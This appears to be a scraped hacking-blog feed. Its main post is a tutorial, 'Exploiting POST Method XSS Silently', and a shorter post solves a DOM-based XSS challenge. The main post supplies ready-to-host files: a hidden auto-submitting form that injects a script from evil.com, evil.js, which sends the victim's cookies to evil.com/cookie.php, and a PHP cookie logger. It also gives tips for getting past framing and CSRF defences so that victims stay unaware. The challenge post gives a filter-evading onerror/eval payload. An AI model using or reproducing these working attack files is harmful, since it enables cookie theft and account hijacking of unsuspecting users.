google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2511450483904536606.post-54225783314497397592013-07-06T18:25:00.004-07:002013-10-23T15:31:26.207-07:00Exploiting POST Method XSS Silently<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/O6WvDUj.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://i.imgur.com/O6WvDUj.jpg" width="320" /></a></div>
POST HTTP method XSS exploitation without the target filling out a form... SILENTLY<br />
<br />
<a name='more'></a><br />
<h4>
What's POST method XSS?</h4>
<br />
A cross-site scripting vulnerability that is exploited by sending the input from a form to the vulnerable website via POST HTTP method (so it could be a search box on a site that uses POST not GET).<br />
<br />
<h4>
How does exploitation differ from GET method XSS?</h4>
<h4>
</h4>
<br />
When a GET request is made, the request is sent over HTTP in the form: website.com/search.php?keyword=whatever.<br />
<br />
When a POST request is made, the request is sent over HTTP in the form:<br />
website.com/search.php<br />
<br />
(the content, e.g keyword=whatever, is sent in the body as part of the HTTP request rather than as part of the URL).<br />
<br />
With that in mind, the typical reflected XSS attack can't be sent to the target like normal:<br />
<br />
<i> website.com/search.php?keyword="><script>evil-javascript</script></i><br />
<br />
With POST method, the user actually has to fill out a form on your evil-site, and usually click "submit" which allows evil-site to then send the user along with the POST request to the target website. The contents of the POST request will contain the javascript payload and end up running. <br />
<br />
<h4>
How do we exploit it?</h4>
<h4>
</h4>
Note: works on Firefox, but will also work on Chrome providing the injected vector renders within script tags.<br />
<br />
Of course asking the user to fill out a form on a strange site is a bit fishy. But using javascript we can submit the form automatically without the user's interaction upon them landing on the page. Moreover, we can do it in the background using a hidden iframe on your evil-site so you can display whatever other content you like whilst they are getting pwnd. If the site doesn't like iframes, we have an alternative method.<br />
<br />
Forget about cross-site request forgery defenses messing this up, if we can run javascript on the target we can always bypass CSRF restrictions. After testing a site and finding vulnerable code to XSS (via POST variables), our aim will be to reference an external javascript file which will contain our extended evil payload.<br />
<br />
<br />
<code><span style="background-color: black;"><span style="color: #ff99ff;"> <SCRIPT SRC='http://myevilsite.com/evil.js'></SCRIPT></span></span></code><br />
<br />
<br />
<br />
<h4>
The exploit code:</h4>
<br />
Upload the following 5 files to a hosting website substituting evil.com with your own webhosting site URL (explanations beneath), and you may also have to change the payload to bypass any security filters that may be in place:<br />
<br />
<br />
<u><b> .htaccess</b></u><br />
<br />
<span style="background-color: black;"></span><code><span style="background-color: black;"><span style="color: #66ccff;">AddType application</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">x</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">httpd</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">php </span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">html</span></span><span style="color: #66ccff;"><br /></span></code><br />
<u><b><br /></b></u>
<u><b>attackpage.html</b></u><br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">H1</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">Innocent page is innocent</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">H1</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">Your bases are not belong to me</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">dun worry bro</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /><? if (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"done"</span><span style="color: #7ac07c;">])) {<br />die();<br />}</span><span style="color: #66ccff;">?></span><iframe src="http://evil.com/background.php" width="1" height="1" frameborder="0"></iframe><br /></body><br /></html> </code></span></span><span style="color: #7ac07c;"><span style="background-color: black;"></span></span></code><br />
<br />
<u><b>background.php</b></u><br />
<br />
<code><span style="color: #7ac07c;"></span><span style="background-color: black;"><span style="color: #66ccff;"><html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br />.</span><span style="color: #66ccff;">xss </span><span style="color: #7ac07c;">{</span><span style="color: #66ccff;">display</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">none</span><span style="color: #7ac07c;">;<br />}<br /></</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br /></</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /><br /><</span><span style="color: #66ccff;">body onload</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS.submit();"</span><span style="color: #7ac07c;">><br /><br /><</span><span style="color: #66ccff;">form id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"xss" </span><span style="color: #66ccff;">action</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"http://www.attackesite.com/search or whatever the sub-folder is/" </span><span style="color: #66ccff;">method</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"post" </span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS"</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">input name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"target" </span><span style="color: #66ccff;">value </span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"all"</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">input name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"address" </span><span style="color: #66ccff;">value</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"<SCRIPT SRC='http://evil.com/evil.js'></SCRIPT>"</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">><br /><br /></</span><span style="color: #66ccff;">form</span><span style="color: #7ac07c;">><br /></</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /><br /></</span><span style="color: #66ccff;">html</span></span><span style="color: #7ac07c;"><span style="background-color: black;">> </span></span></code><br />
<br />
<b>Note:</b> You may need to use tinyurl.com to shorten the evil url.<br />
<br />
<u><b>evil.js</b></u><br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"http://evil.com/cookie.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">encodeURIComponent(document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span></span><span style="color: #7ac07c;"><span style="background-color: black;">)); </span></span></code><br />
<br />
<u><b>cookie.php</b></u><br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?<br /><br />$file </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">"cookies.txt"</span><span style="color: #7ac07c;">;<br /><br />if (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"cookie"</span><span style="color: #7ac07c;">])) {</span><span style="color: #66ccff;">$handle </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">fopen</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'a'</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;">fwrite</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$handle</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"\r\n" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"cookie"</span><span style="color: #7ac07c;">]);</span><span style="color: #66ccff;">fclose</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$handle</span><span style="color: #7ac07c;">);<br /><br />}<br /> </span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><code><span style="background-color: black;"><span style="color: #66ccff;"><script>window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"http://evil.com/attackpage.html?done=yes"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">);</script> </span></span></code> </span></code></span></div>
</div>
<br />
<br />
<br />
<u><b>So what is happening here:</b></u><br />
<br />
The victim finds themselves on evil-site's <u><b>attackpage.html</b></u><br />
<br />
An iframe on <u><b>attackpage.html</b></u> opens up <u><b>background.php</b></u> which has an input form tailored for the specific target site.<br />
<br />
<b>NOTE</b>: The form variables "target" and "address" were found by viewing the original HTTP request with the Firefox extension <a href="https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/">Live HTTP Headers</a>. <br />
<br />
<br />
When the HTML body fully loads, the "onload" javascript event is triggered which calls the submit method of the form named XSS (this ensures the form is completely loaded before doing anything):<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">body onload</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS.submit();"</span><span style="color: #7ac07c;">> </span></span></code><br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"></span></span></code><br />
The browser will then send a POST HTTP request to the targeted site with the embeded payload without the victim having to enter anything or click the submit button.<br />
<br />
The iframe is hidden so this will happen in the background, however, a few sites have implemented a click-jacking defense by returning the following in the HTTP response header:<br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">X</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">Frame</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">Options</span><span style="color: #7ac07c;">: </span></span><span style="color: #66ccff;"><span style="background-color: black;">Deny </span></span></code><br />
<code><span style="color: #66ccff;"><span style="background-color: black;"><br /></span></span></code>
This causes the page not to load in an iframe. If this is the case, we can just do a meta-refresh redirect from <u><b>attackpage.html</b></u> like so:<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">meta http</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">equiv</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"refresh" </span><span style="color: #66ccff;">content</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"0;URL='http://evil.com/background.php'"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">> </span></span></code><br />
<br />
You can then remove the iframe on <u><b>background.php</b></u> and replace it with:<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">SCRIPT SRC</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'http://evil.com/background.php'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;"></SCRIPT></span></span></code><br />
<br />
This will bring up <u><b>background.php</b></u> but the form will be <u>hidden</u> due to some CSS goodness:<br />
<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br />.</span><span style="color: #66ccff;">xss </span><span style="color: #7ac07c;">{</span><span style="color: #66ccff;">display</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">none</span><span style="color: #7ac07c;">;<br />}<br /></</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">></span></span></code><br />
<br />
<br />
In either case, the payload calls evil.js from evil.com, and this forwards the victim along with their targeted site cookies to evil.com/cookie.php. The cookie catcher grabs the cookie from the request and writes it to a text file on the web-host. Immediately the user is sent back to the attackpage.html with the HTTP request in the form:<br />
<br />
attackpage.html?done=yes.<br />
<br />
That's why we added the .htaccess file, so we can handle the request with PHP even though it is a html file.<br />
<br />
All that the user will see during this entire process is the progress indicator in the browser taking a couple more seconds than usual, and shouldn't have a clue they have been pwnd!<br />
<br />
<h4>
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script><br />
I made a demo page which clearly shows this exploit for people that are interested. Just substitute the following pages on your hosting site:<br />
<br />
<u><b>attackpage.html</b></u><br />
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br />function </span><span style="color: #66ccff;">Iframe</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">iFrame</span><span style="color: #7ac07c;">)<br />{<br /><br /> var </span><span style="color: #66ccff;">IFramer </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">iFrame</span><span style="color: #7ac07c;">);<br /> var </span><span style="color: #66ccff;">content </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">IFramer</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">contentWindow</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">innerHTML</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"XSS"</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML</span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">'<b>cookies were actually stolen a few seconds ago!:</b> ' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">decodeURIComponent</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">content</span><span style="color: #7ac07c;">);<br /><br />}<br /> </span><span style="color: #66ccff;"></script></span><br /></head><br /><body><br /><H1>POST HTTP METHOD XSS DEMO - Targeted site.com</H1><br /><P>Just by visiting this page, all your bases have been belonged to me'd</p><br /><a href="#" onclick="Iframe('cookies')">Reveal</a><br /><div id="XSS"></div><br /><br /><iframe id="cookies" src="/background.php" width="1" height="1" frameborder="0"></iframe><br /><br /></body><br /><br /></html> </code></span><br />
<div class="body">
<code></code><u><b>cookies.php</b></u><br />
<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: #444444;"><code><span style="color: #66ccff;"><?</span><span style="color: #7ac07c;">echo </span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'cookie'</span><span style="color: #7ac07c;">];</span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
</div>
<u><b>The other files are the same.</b></u><span style="background-color: #444444;"><code><span style="color: #66ccff;"><span style="background-color: #444444;"></span></span></code></span></div>
</div>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-2511450483904536606.post-59021542798991753242013-05-19T10:18:00.000-07:002013-10-23T15:32:15.093-07:00"One does not simply finds a DOM based XSS without js analysis"<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dSORGv6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="484" src="http://i.imgur.com/dSORGv6.jpg" width="640" /></a></div>
<br />
Checkout this cool blog from Prakhar Prasad (<a href="http://blog.prakharprasad.com/">http://blog.prakharprasad.com/</a>), they setup an interesting XSS challenge that requires code analysis to solve, here: <a href="http://xss.prakharprasad.com/">xss.prakharprasad.com</a> (also thanks to MaXoNe who I think contributed to it).<br />
<br />
<a name='more'></a><br />
//(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<br />
It's a fun challenge, try it yourself! My solution/analysis below:<br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">ignoring commented out lines</span><span style="color: #7ac07c;">: */</span><span style="color: #66ccff;">1.</span><span style="color: #7ac07c;">)<br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { <br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">)); </span><span style="color: #ffcccc;">//returns the integers from the unicode equivalent of data<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">2.</span><span style="color: #7ac07c;">)<br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//convert data from unicode equivalent to string<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">3.</span><span style="color: #7ac07c;">)<br /><br /> function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { </span><span style="color: #ffcccc;">//function decode variable 'data'<br /> </span><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">; </span><span style="color: #ffcccc;"><br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">6</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//cut the last 6 characters out of data<br /> </span><span style="color: #7ac07c;">for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) { </span><span style="color: #ffcccc;">//for each character in the 'cut' data...<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) - </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">)) </span><span style="color: #ffcccc;">//converts the data from unicode (less 1) back to string<br /> </span><span style="color: #7ac07c;">}<br /> return </span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }</span><span style="color: #66ccff;">4.</span><span style="color: #7ac07c;">)<br /><br /> function </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { <br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//get string (less 1 in unicode for each character), set new data variable<br /> //filter- regmatch: "alert(", "prompt(", or "confirm(" return null if any found.<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= (</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'bmfsu)itSvMl'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'qspnqu)eUbfjz'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'dpogjsn)ptBfCe'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">);<br /> return (</span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">? </span><span style="color: #66ccff;">null </span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }</span><span style="color: #66ccff;">5.</span><span style="color: #7ac07c;">)<br /><br />function </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)<br /><br /> {<br /> return </span><span style="color: #66ccff;">unescape</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">));</span><span style="color: #ffcccc;">//unescape uri encoded hash, drop first character<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">6.</span><span style="color: #7ac07c;">)<br /><br /> if (</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">) { </span><span style="color: #ffcccc;">//now dealing with url anchors e.g. whatever.html#data<br /><br /> </span><span style="color: #66ccff;">taint </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)); </span><span style="color: #ffcccc;">//taint= input data only if doesn't contain alert(, prompt( etc..<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//cond= data from url<br /><br /> </span><span style="color: #7ac07c;">if (</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">) == </span><span style="color: #ff99ff;">'!'</span><span style="color: #7ac07c;">) {</span><span style="color: #ffcccc;">//if the last character in the data is "!", then change the hello element's html<br /><br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">taint</span><span style="color: #7ac07c;">;<br /><br /> }<br /> } else {<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">+= </span><span style="color: #ff99ff;">'<br> Try to find a valid XSS vector, after reviewing the code :)'<br /> </span></span><span style="color: #7ac07c;"><span style="background-color: black;">}</span></span></code><br />
<br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code> Lets reverse:</code></span></span></span><br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><br /></code></span></span></span>
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>1. Innerhtml (DOM) cannot run JS via JS tags, but we have an app for that! onerror attribute!: <img src=a onerror=alert()></code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>2. we need to have a "!" at the end of the vector. Vector now: </code></span></span></span><span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><img src=a onerror=alert()>!</code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>3. Defeat the filter, indexof won't find alert if it is charcode encoded (overkill<span style="font-family: Georgia,"Times New Roman",serif;">).</span> Also add 6 characters that are stripped. Vector now: "<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>!!!!!!!!"</code></span></span></span><br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code></code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>4. and finally add 1 in unicode to each character "=jnh!tsd>b!pofssps>fwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-78-215-212-:8-227-226-222-221-4:-52**?""!!!!"<br /> </code></span></span></span><br />
<a href="http://xss.prakharprasad.com/#=jnh!tsd%3Eb!pofssps%3Efwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-225-59-221-214-43-22:-:8-226-43-215-212-225-212-4:-52**?!!!!!!!" target="_blank"><span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>http://</code></span></span></span>xss.prakharprasad.com#<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><span style="font-family: Georgia,"Times New Roman",serif;">=jnh!tsd>b!pofssps>fwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-225-59-221-214-43-22:-:8-226-43-215-212-225-212-4:-52**?!!!!!!!</span></code></span></span></span></a><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><b>The encoded vector was achieved by simply reversing the original code, open the below in your browser to do it yourself. </b></code></span></span></span><br />
<br />
